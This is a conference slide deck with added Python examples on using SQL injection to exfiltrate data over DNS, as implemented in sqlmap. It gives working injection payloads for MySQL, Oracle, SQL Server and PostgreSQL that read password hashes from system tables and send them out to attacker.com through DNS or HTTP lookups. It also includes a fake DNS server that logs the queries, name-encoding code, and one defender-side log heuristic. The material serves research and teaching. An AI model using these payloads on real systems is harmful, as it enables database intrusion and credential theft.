DNS exfiltration using sqlmap

Miroslav Štampar (dev@sqlmap.org)
What is SQL injection?



   “SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of DBMS server for parsing and execution”

   (source: msdn.microsoft.com)




PHDays 2012, Moscow (Russia)                     May 31, 2012   2
What is SQL injection? (2)
 In plain speak, SQL injection is all about unauthorized database access
 “Hello World” vulnerable code example (PHP/MySQL):
    $sql = "SELECT * FROM events WHERE id = " . $_GET["id"];
    $result = mysql_query($sql);
 Sample attack:
    http://www.target.com/vuln.php?id=1 AND (SELECT 5502 FROM(SELECT COUNT(*),CONCAT(0x3a,(SELECT password FROM mysql.user LIMIT 0,1),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
What is SQL injection? (3)

 Harder example (PHP/MySQL):
    error_reporting(0);                 // nothing is reported to the page, so no error-based channel
    set_magic_quotes_runtime(true);
    // Age is interpolated unquoted, so quoting/escaping does not help there
    $sql = "INSERT INTO Users (FirstName, LastName, Age) VALUES ('$_REQUEST[firstname]','$_REQUEST[lastname]',$_REQUEST[age])";
    @mysql_query($sql);                 // INSERT returns no rows to the page either




Technique classification
 Inband (web page as channel)
    Union
         Full
         Partial
    Error-based
 Inference (bit-by-bit)
    Boolean-based blind
    Time-based (and stacked queries)
 Out-of-band (alternative transport channels)
    HTTP
    DNS
Inband techniques
 Error-based – CONVERT(INT,(<subquery>)),
  fast, 1 (sub)query result per request, based on
  inclusion of subquery result(s) inside DBMS
  error message
 Union – UNION ALL SELECT NULL,..., 
  (<subquery>),NULL,NULL,..., fastest, in
  FULL variant whole table dump per request, in
  PARTIAL variant 1 query result per request




Inference techniques
 Boolean-based blind – AND 1=1, slow, 1 bit per
  request, page differentiation based, low
  difference ratio represents True response, False
  otherwise (in most common cases)
 Time-based – AND 1=IF(2>1, BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0), slowest, 1 bit per request, delay represents True response, False otherwise
 Stacked queries – ;INSERT INTO users VALUES 
  (10, 'test', 'testpass'), usually time-based
  data retrieval

Out-of-band (OOB) techniques
 HTTP – AND LENGTH(UTL_HTTP.REQUEST('http://www.attacker.com/log.php?q='||(SELECT password FROM SYS.USER$ WHERE name='SYS')))>0, fast, 1 (sub)query result per request, capturing/logging HTTP requests at the other side
 DNS – AND LENGTH(UTL_INADDR.GET_HOST_ADDRESS((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.attacker.com'))>0, relatively fast, 1 part of (sub)query result per request, capturing/logging DNS requests at the other side
DNS protocol
 relatively simple protocol
 resolving domain names
 UDP datagrams (except zone transfers which
  use TCP)
 forwarding requests for arbitrary domain
  names
 ...even if access to public networks is not
  allowed :)




DNS protocol (2)
 Name resolving methods:
    Client lookup – checking local client's cache
     (same request already occurred)
    Iterative – checking DNS server's cache and
     configured zone records
    Recursive – if other methods fail, query is
     forwarded to others, sending back retrieved
     results to client




DNS protocol (3)




DNS exfiltration


   “Exfiltration [eks-fil-treyt, eks-fil-treyt]
   1. verb (used without object): to escape furtively from an area under enemy control
   2. verb (used with object): to smuggle out of an area under enemy control”

   (source: dictionary.reference.com)



DNS exfiltration (2)
 When fast inband techniques fail, data is (usually) extracted bit by bit
 Most attackers will avoid exploitation of targets with the time-based technique
 Non-query SQL statements like INSERT/UPDATE/DELETE are especially problematic
 Alternative methods are more than welcome (e.g. uploading of web shell scripts)
 OOB techniques have rarely been used (till now)


DNS exfiltration (3)
 In some cases it's possible to incorporate SQL
  (sub)query results into DNS resolution requests
 Any function that accepts a network address could be used
 Microsoft SQL Server, Oracle, MySQL and
  PostgreSQL
 Potentially dozens of resulting characters can
  be transferred per single request




DNS exfiltration (4)

 Microsoft SQL Server:
    DECLARE @host varchar(1024);
    SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa')+'.attacker.com';
    -- xp_dirtree on a UNC path (\\<host>\share) makes the server resolve <host> first
    EXEC('master..xp_dirtree "\\'+@host+'\c$"');




DNS exfiltration (5)

 Oracle:
    SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.attacker.com',80) FROM DUAL;

 MySQL:
    -- LOAD_FILE() on a UNC path; backslashes are doubled because of MySQL string escaping
    SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));




DNS exfiltration (6)

 PostgreSQL:
    DROP TABLE IF EXISTS table_output;
    CREATE TABLE table_output(content text);
    CREATE OR REPLACE FUNCTION temp_function()
    RETURNS VOID AS $$
    DECLARE
        exec_cmd TEXT;
        query_result TEXT;
    BEGIN
        SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres');
        -- COPY ... FROM a UNC path; backslashes are doubled once for the outer E'' string
        -- and once more for the inner E'' string that EXECUTE evaluates
        exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.attacker.com\\\\foobar.txt\'';
        EXECUTE exec_cmd;
    END;
    $$ LANGUAGE plpgsql SECURITY DEFINER;
    SELECT temp_function();


DNS exfiltration (7)




DNS exfiltration (8)




Integration into sqlmap
 New command line option: --dns-domain
    Turns on DNS exfiltration support
    Domain to which the provoked DNS requests should point (e.g. --dns-domain=attacker.com)
 DNS exfiltration vectors are sent through a previously detected SQLi (e.g. time-based)
 Inband techniques automatically have higher priority
 Hence, DNS exfiltration is usable only in inference-only cases



Integration into sqlmap (2)


 Domain name server entry (e.g.
  ns1.attacker.com) has to point to IP address of
  machine running sqlmap
    sqlmap being run as a fake DNS server
    Serving and logging all incoming DNS requests
    Dummy responses (e.g. 127.0.0.1) sent just to
     unblock web server instance
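The query/answer exchange this slide describes, as an added Python example that is not sqlmap's implementation: the wire-format question is parsed, the name is logged, and a dummy A record (127.0.0.1) is returned so the DBMS call on the other side completes instead of timing out. It assumes a single uncompressed question and skips EDNS and error responses.

```python
import socket
import struct


def encode_name(name: str) -> bytes:
    """Wire-format a domain name: length-prefixed labels ending in a zero octet."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError("label length must be 1..63 octets (RFC 1034)")
        out += struct.pack("B", len(raw)) + raw
    return out + b"\x00"


def decode_name(packet: bytes, offset: int):
    """Read an uncompressed name at offset; return (name, offset just past it)."""
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer where a plain label was expected")
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_query(qname: str, txid: int) -> bytes:
    """The recursive A query that the resolver in front of the DBMS host sends."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)      # RD=1, one question
    return header + encode_name(qname) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_query(packet: bytes):
    """Return (txid, qname, qtype) of the first question; qname is what gets logged."""
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if flags & 0x8000 or qdcount < 1:
        raise ValueError("not a DNS query")
    qname, offset = decode_name(packet, 12)
    qtype, _qclass = struct.unpack("!HH", packet[offset:offset + 4])
    return txid, qname, qtype


def build_dummy_response(query: bytes, ip: str = "127.0.0.1") -> bytes:
    """Answer with a throw-away A record so the DBMS call returns instead of
    waiting for a timeout (the 'unblock the web server' step on the slide)."""
    txid, qname, _qtype = parse_query(query)
    question = query[12:12 + len(encode_name(qname)) + 4]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA set; NOERROR
    # The answer's owner name is a pointer (0xC00C) back to the QNAME at offset 12.
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + socket.inet_aton(ip)
    return header + question + answer


def parse_answer_ip(response: bytes) -> str:
    """Client side: pull the IPv4 address out of the first answer record."""
    _txid, flags, _qd, ancount = struct.unpack("!HHHH", response[:8])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a DNS response carrying an answer")
    _, offset = decode_name(response, 12)
    offset += 4                                   # skip QTYPE and QCLASS
    if response[offset] & 0xC0:                   # compressed owner name
        offset += 2
    else:
        _, offset = decode_name(response, offset)
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", response[offset:offset + 10])
    offset += 10
    if rtype != 1 or rdlen != 4:
        raise ValueError("first answer is not an A record")
    return socket.inet_ntoa(response[offset:offset + 4])


def serve(bind_addr: str = "0.0.0.0", port: int = 53) -> None:
    """Minimal logging responder: print every query name, answer with the dummy record."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((bind_addr, port))
        while True:
            data, peer = sock.recvfrom(512)
            try:
                _, qname, _ = parse_query(data)
            except (ValueError, IndexError, struct.error):
                continue                          # malformed, or not a query
            print(f"{peer[0]} query: {qname}")
            sock.sendto(build_dummy_response(data), peer)


if __name__ == "__main__":
    serve()   # binding port 53 needs privileges
```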




Integration into sqlmap (3)
 Each pushed result is enclosed with a unique prefix and suffix (e.g. Xzk. … .iUR.attacker.com)
    Defeats caching mechanisms (every name is distinct)
    Easy to match SQLi requests with DNS results
 Complying with RFC 1034 (Domain Names – Concepts and Facilities)
    Hex encoding of results to preserve non-word chars
    Splitting long items into parts of length 63 (maximum length of one label name)
    Otherwise DNS resolution requests are immediately dropped as invalid (no resolution)

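The label scheme on this slide worked through as an added Python example (not sqlmap's own code): hex encoding, splitting into labels of at most 63 characters, enclosing with a prefix and suffix, the inverse reassembly the logging side performs, and a query-log heuristic a defender can use to flag such names. The fixed prefix Xzk and suffix iUR, the sample result and the BIND-style log lines are all constructed.

```python
import binascii
import re

# RFC 1034 limits: a label is at most 63 octets; a full name is kept under
# 253 characters in its textual form (255 octets on the wire).
MAX_LABEL = 63
MAX_NAME = 253
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
HEX_LABEL_RE = re.compile(r"^[0-9a-fA-F]{32,63}$")
QUERY_RE = re.compile(r"query: (\S+) IN ")


def rfc1034_ok(name: str) -> bool:
    """True if every label is 1..63 letter/digit/hyphen chars and the name fits."""
    if not name or len(name) > MAX_NAME:
        return False
    return all(LABEL_RE.match(label) for label in name.rstrip(".").split("."))


def encode_result(data: bytes, prefix: str, suffix: str, domain: str) -> str:
    """Wrap one (sub)query result as the slide describes: hex-encode it, split
    the hex into labels of at most 63 characters and enclose it with a unique
    prefix and suffix under the chosen domain."""
    hexed = binascii.hexlify(data).decode("ascii")
    labels = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    name = ".".join([prefix, *labels, suffix, domain])
    if not rfc1034_ok(name):
        # Resolvers drop such names silently: the result must go in more requests.
        raise ValueError("encoded result does not fit one RFC 1034 name")
    return name


def decode_query(name: str, prefix: str, suffix: str, domain: str):
    """Inverse step on the logging side: check domain, prefix and suffix,
    join the hex labels in between and decode. Returns None if the name
    is not one of ours (e.g. an unrelated lookup hitting the same server)."""
    if not rfc1034_ok(name):
        return None
    labels = name.rstrip(".").split(".")
    tail = domain.split(".")
    if labels[-len(tail):] != tail:
        return None
    body = labels[:-len(tail)]
    if len(body) < 3 or body[0] != prefix or body[-1] != suffix:
        return None
    try:
        return binascii.unhexlify("".join(body[1:-1]))
    except binascii.Error:
        return None


def suspicious_hex_labels(qname: str) -> bool:
    """Defender-side heuristic: long all-hex labels are characteristic of
    this kind of exfiltration and rare in legitimate host names."""
    return any(HEX_LABEL_RE.match(label) for label in qname.split("."))


def scan_log(text: str) -> list:
    """Return the query names in a BIND-style query log that trip the heuristic."""
    hits = []
    for line in text.splitlines():
        match = QUERY_RE.search(line)
        if match and suspicious_hex_labels(match.group(1)):
            hits.append(match.group(1))
    return hits


# Constructed sample: a fake 'user:hash' result; prefix/suffix are fixed instead
# of random so the round trip is reproducible. The log lines are constructed in
# a simplified BIND 9 "query:" format, not real captures.
SAMPLE_RESULT = b"root:*CONSTRUCTED_HASH_0123456789ABCDEF"
EXFIL_NAME = encode_result(SAMPLE_RESULT, "Xzk", "iUR", "attacker.com")
SAMPLE_LOG = (
    "client 172.16.138.129#1040: query: www.example.com IN A +\n"
    f"client 172.16.138.129#1041: query: {EXFIL_NAME} IN A +\n"
)

if __name__ == "__main__":
    print(EXFIL_NAME)
    print(decode_query(EXFIL_NAME, "Xzk", "iUR", "attacker.com"))
    print(scan_log(SAMPLE_LOG))
```

The 39-byte sample becomes 78 hex characters, which is why it is split into a 63-character and a 15-character label.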
Experimental setup

1) Attacker (172.16.138.1)
    ➢ physical machine – Ubuntu 12.04 LTS 64-bit OS
    ➢ sqlmap v1.0-dev (r5100)
2) Web Server (172.16.138.129)
    ➢ virtual machine – Windows XP 32-bit SP1 OS
    ➢ XAMPP 1.7.3 with SQLi vulnerable MySQL/PHP web application
3) DNS Server (172.16.138.130)
    ➢ virtual machine – CentOS 6.2 64-bit OS
    ➢ BIND9 DNS daemon

Results
(--dump -T COLLATIONS -D information_schema)

         Method                 # of requests   Time (sec)
         Boolean-based blind    29,212          214.04
         Time-based (1 sec)     32,716          17,720.51
         Error-based            777             9.02
         Union (full/partial)   3/136           0.70/2.50
         DNS exfiltration       1,409           35.31


Video presentation




Questions?




